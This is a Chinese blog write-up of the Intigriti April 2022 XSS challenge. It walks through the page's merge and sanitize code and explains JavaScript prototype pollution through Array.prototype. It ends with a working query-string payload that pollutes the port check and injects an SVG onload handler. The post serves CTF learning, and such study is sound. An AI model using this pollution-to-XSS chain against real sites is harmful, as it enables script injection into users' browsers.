原型链污染 --- 2022.04ctf

最新推荐文章于 2024-07-21 04:43:23 发布
最新推荐文章于 2024-07-21 04:43:23 发布
阅读量627 收藏 1
点赞数
分类专栏: 安全 文章标签: ui
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63069714/article/details/129526820
版权

目录

首先查看源码​编辑

分析

原理

第一次污染

第二次污染

污染config和settings的解

挑战的地址:Intigriti April Challenge

首先查看源码

此时是无法看到源码的,需要进入到Window Maker的界面

此时在查看源码就可以看到源码了 

由于源码比较多,我们不可能逐一分析。在原型链污染的漏洞中,我们首先就要查找merge函数

        function main() {
          const qs = m.parseQueryString(location.search)

          let appConfig = Object.create(null)
          appConfig["version"] = 1337
          appConfig["mode"] = "production"
          appConfig["window-name"] = "Window"
          appConfig["window-content"] = "default content"
          appConfig["window-toolbar"] = ["close"]
          appConfig["window-statusbar"] = false
          appConfig["customMode"] = false

          if (qs.config) {
            merge(appConfig, qs.config)
            appConfig["customMode"] = true
          }

          let devSettings = Object.create(null)
          devSettings["root"] = document.createElement('main')
          devSettings["isDebug"] = false
          devSettings["location"] = 'challenge-0422.intigriti.io'
          devSettings["isTestHostOrPort"] = false

          if (checkHost()) {
            devSettings["isTestHostOrPort"] = true
            merge(devSettings, qs.settings)
          }

          if (devSettings["isTestHostOrPort"] || devSettings["isDebug"]) {
            console.log('appConfig', appConfig)
            console.log('devSettings', devSettings)
          }

          if (!appConfig["customMode"]) {
            m.mount(devSettings.root, App)
          } else {
            m.mount(devSettings.root, {view: function() {
              return m(CustomizedApp, {
                name: appConfig["window-name"],
                content: appConfig["window-content"] ,
                options: appConfig["window-toolbar"],
                status: appConfig["window-statusbar"]
              })
            }})
          }

          document.body.appendChild(devSettings.root)
        }

        function checkHost() {
          const temp = location.host.split(':')
          const hostname = temp[0]
          const port = Number(temp[1]) || 443
          return hostname === 'localhost' || port === 8080
        }

        function isPrimitive(n) {
          return n === null || n === undefined || typeof n === 'string' || typeof n === 'boolean' || typeof n === 'number'
        }

        function merge(target, source) {
          let protectedKeys = ['__proto__', "mode", "version", "location", "src", "data", "m"]

          for(let key in source) {
            if (protectedKeys.includes(key)) continue

            if (isPrimitive(target[key])) {
              target[key] = sanitize(source[key])
            } else {
              merge(target[key], source[key])
            }
          }
        }
        function sanitize(data) {
          if (typeof data !== 'string') return data
          return data.replace(/[<>%&\$\s\\]/g, '_').replace(/script/gi, '_')
        }

        main()

分析

此题最终的触发流程在于document.body.appendChild(devSettings.root)

所以我们需要去修改devSettings.root的属性,往上追溯,如果要走到这个流程,必须改使得checkHost( )的值为ture,才能够进入merge方法中,对devSettings对象的值进行修改。

function checkHost() {
  const temp = location.host.split(':')
  const hostname = temp[0]
  const port = Number(temp[1]) || 443
  return hostname === 'localhost' || port === 8080
}

checkHost( )的判断条件为hostname等于localhost或是port等于8080,显然从正常情况下看来,无论如何都不可能满足这个条件的。但是作者在这里设计了一个很巧妙的代码,重点在于temp[1],temp是一个数组,从数组中取了下标1这个值。

'1' == 1
//ture
a['1'] == a[1]
//ture

JavaScript中,数组的下标可以用字符或是字符串数字来取值,所以在原型链中,我们可以给[ ]对象添加一个名称为1的属性,这样temp再通过下标1取值的时候,实际上取到的是数组中属性为1的值

[].constructor.prototype['1'] = 8080
//[1: 8080, constructor: ƒ, concat: ƒ, copyWithin: ƒ, fill: ƒ, find: ƒ, …]

根据代码逻辑,我们需要同时满足对象类型为Array,为什么这里要使用到Array呢?

原因就是appConfig["window-toolbar"] = ['close']是一个类似数组的对象,满足要求的只能是数组,因为下面的代码在取值的时候是以数组的形式在取值,因此赋值的时候也肯定要以数组的形式来传递。

 可被merge的参数,满足这样条件的只有

appConfig["window-toolbar"] = ["close"]

我们的伪代码应当为

appConfig["window-toolbar"].constructor['1'] = 8080

接下来要做的,就是继续去替换devSettings.root的值了,替换body中的即可。

原理

第一次污染

因为只有满足了appConfig["customMode"] = ture才能够让qs.Config替换掉appConfig,这样程序下能继续往下走。

传递的参数是

?config[window-toolbar][constructor][prototype][1]=8080

其中的constructor就相当于是Object原型

第二次污染

这次传递的是settings,需要满足devSettings["isTestHostOrPort"] = ture,才能满足merge函数,使得qs.settings能够替换到devSettings。然后使得程序能够继续往下走。

这里虽然settings传递进来了,但是是以key,vlaue的形式肯定是不行的,此时我们的root是创建出来的main。此时要给main中插入我们的HTML代码肯定是不能这样传值的,以上面这种方式肯定是插不进去的,此时我们思考的是,先用main找到我们的document,在找到body,依次往下找,最终找到我们可以插入的值。

污染config和settings的解法

payload

?config[window-toolbar][constructor][prototype][1]=8080&settings[root][ownerDocument][body][children][1][outerHTML][1]=%3Csvg%20onload%3Dalert(1)%3E

努力学IT的小徐
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ctf-all-in-one.pdf
05-25
CTF-All-In-One(CTF 从入门到放弃) ——“与其相信谣言,不如一直学习。”ctf基础加入门题
CTF-Tools-v1.3.7.zip
01-29
CTF常用工具集
NodeJS原型链污染&ctfshow_nodejs
leekos的博客,分享web安全相关知识~
08-05 1218
最近又遇到了有关原型链污染的题目,所以在此总结一下,方便回顾。
redpwnctf-web-blueprint-javascript 原型链污染学习总结
weixin_30376453的博客
08-19 242
前几天看了redpwn的一道web题,node.js的web,涉及知识点是javascript 原型链污染,以前没咋接触过js,并且这个洞貌似也比较新,因此记录一下学习过程 1.本机node.js环境安装 题目都给了源码,所以本地就可以直接安装package.json依赖并本地模拟调试 首先subline安装node环境: http://nodejs.org/ http...
2024年最新安全基础 --- 原型链污染
2401_84302722的博客
05-03 629
如果攻击者控制并修改了一个对象的原型,那将可以影响所有和这个对象来自同一个类、父类的对象,这种攻击方式就是原型链污染
CTF】Python原型链污染
Luminous_song的博客
08-05 957
在Python中每个对象都有一个原型,原型上定义了对象可以访问的属性和方法。当对象访问属性或方法时,会先在自身查找,如果找不到就会去原型链上的上级对象中查找,原型链污染攻击的思路是通过修改对象原型链中的属性,使得程序在访问属性或方法时得到不符合预期的结果。
CATCTF wife原型链污染
qq_51796436的博客
02-21 1008
原型链污染原理:https://drun1baby.github.io/2022/12/29/JavaScript-%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/如下代码,prototype是newClass类的一个属性。newClass实例化的对象newObj的.__proto__指向newClass类的JSON 解析的情况下,__proto__会被认为是一个真正的“键名”,而不代表“原型”。如果是则__proto__会被认为是o2的原型。
JavaScript Prototype污染攻击(CTF 例题分析)
a3320315的博客
11-03 1967
0x01 先谈谈自己的理解 function a(){} var b=new a() var c = {} a.__proto__.__proto__ == b.__proto__.__proto__ == c.__proto__ a.__proto__ != b.__proto__ != c 这个时候 b的__proto__ 指向的就是a.prototype a.prototype的_...
[GYCTF2020]Ez_Express 原型链污染
qq_54929891的博客
05-03 505
进入链接可以发现是一个登录界面 ,自己注册一个新账户的话登陆进去什么东西也没有,提示你要用ADMIN登录,我账户名用ADMIN的话,报错敏感信息 难道是一个烦人的注入题么,不急先扫一下站看看,发现有个www.zip压缩包泄露,将源码下载下来 可以了解到是一个js的题目,寻找一下跟登录有关的界面代码 router.post('/login', function (req, res) { if(req.body.Submit=="register"){ if(safeKeyword..
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF指南-常规的CTF题目解析.pptx
10-12
CTF指南-常规的CTF题目解析
原型链污染
m0_62422842的博客
06-06 2267
原型链污染是一个关于前端js的相关漏洞,原型链污染可拆分为两部分,什么是原型链,又如何进行污染
[GYCTF2020]Ez_Express-原型链污染学习
cjdgg的博客
08-18 2018
[GYCTF2020]Ez_Express-原型链污染学习 最近学习下nodejs相关的题目,所以做了这道题 进入题目界面长这样 简单的试了下功能,也就是一个登录注册按钮,登陆后如下所示 要求需要ADMIN登录,这是一个不能注册的账户,而且我们又不知道密码 没法进行下去的时候试一试扫描目录,结果还真扫出了源代码 通过审代码我们发现,注册的时候调用了safeKeyword函数,这个函数使我们注册时不能用admin,但是又需要题目要求用ADMIN登录才行 这里我是正好看了做上一道js题目时收藏的tric
NodeJS原型链污染
Aiwin的博客
05-11 1067
NodeJS原型链污染
渗透攻击漏洞之——原型链污染
weixin_51525416的博客
08-02 3440
JavaScript 中所有的对象都有一个内置属性,称为它的prototype(原型)。它本身是一个对象,故原型对象也会有它自己的原型,逐渐构成了原型链原型链终止于拥有null作为其原型的对象上。指向对象原型的属性并不是prototype。它的名字不是标准的,但实际上所有浏览器都使用__proto__。访问对象原型的标准方法是 Object.getPrototypeOf()。JavaScript 规定,所有对象都有自己的原型对象(prototype)。
渗透攻击方法:原型链污染
txtxla的博客
08-05 885
在计算机安全性方面,沙箱(沙盒、sanbox)是分离运行程序的安全机制,提供一个隔离环境以运行程序。通常情况下,在沙箱环境下运行的程序访问计算机资源会受到限制或者禁止,资源包括内存、网络访问、主机系统等等。沙箱通常用于执行不受信任的程序或代码,例如用户输入、第三方模块等等。其目的为了减少或者避免软件漏洞对计算机造成破坏的风险.
[GYCTF2020]Ez_Express 原型链污染 js大小写特性
scrawman的博客
01-24 782
[GYCTF2020]Ez_Express 随便注册一个账号登录,查看源代码可以发现www.zip的提示 下载源码,找到index.js var express = require('express'); var router = express.Router(); const isObject = obj => obj && obj.constructor && obj.constructor === Object; const merge = (a, b) =&g
python原型链污染
最新发布
qq_66013948的博客
07-21 1076
​ python 中的原型链污染是指通过修改对象原型链中的属性,对程序的行为产生以外影响或利用漏洞进行攻击的一种技术。​ 在 Python中,对象的属性和方法可以通过原型链继承来获取。每个对象都有一个原型,原型上定义了对象可以访问的属性和方法。当对象访问属性或方法时,会先在自身查找,如果找不到就会去原型链上的上级对象中查找,原型链污染攻击的思路是通过修改对象原型链中的属性,使得程序在访问属性或方法时得到不符合预期的结果。常见的原型链污染攻击包括修改内置对象的原型、修改全局对象的原型等。
ctf工具之binwalk--windows下(misc).rar
07-30
binwalk是一款用于分析和提取嵌入在二进制文件中的文件和数据的工具。对于CTF比赛来说,binwalk可以帮助我们进行文件的分析和提取,从而更好地理解题目并解决问题。 在Windows下使用binwalk,我们首先需要在官方网站(https://github.com/ReFirmLabs/binwalk)下载并安装binwalk的Windows版本。安装完成后,我们可以在命令行中使用binwalk命令进行操作。 拿到CTF题目中的misc.rar文件后,我们可以使用binwalk来分析该文件。在命令行中,我们输入以下命令: binwalk misc.rar binwalk会对该文件进行分析,并将分析结果显示在命令行中。它会检测并提取出文件中的隐藏信息,并尝试识别文件中可能存在的其他类型文件(如图像、压缩包等)。 除了显示分析结果外,binwalk还支持提取文件中的隐藏文件。我们可以使用以下命令来提取隐藏文件: binwalk -e misc.rar 这会将隐藏在misc.rar中的文件提取到当前目录中。我们可以通过查看提取出的文件来获得进一步的线索或解答。 总之,binwalk是一款强大的CTF工具,它可以帮助我们分析和提取嵌入在二进制文件中的文件和数据。在Windows下使用binwalk可以通过命令行进行操作,从而更好地解决CTF比赛中的问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

努力学IT的小徐

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值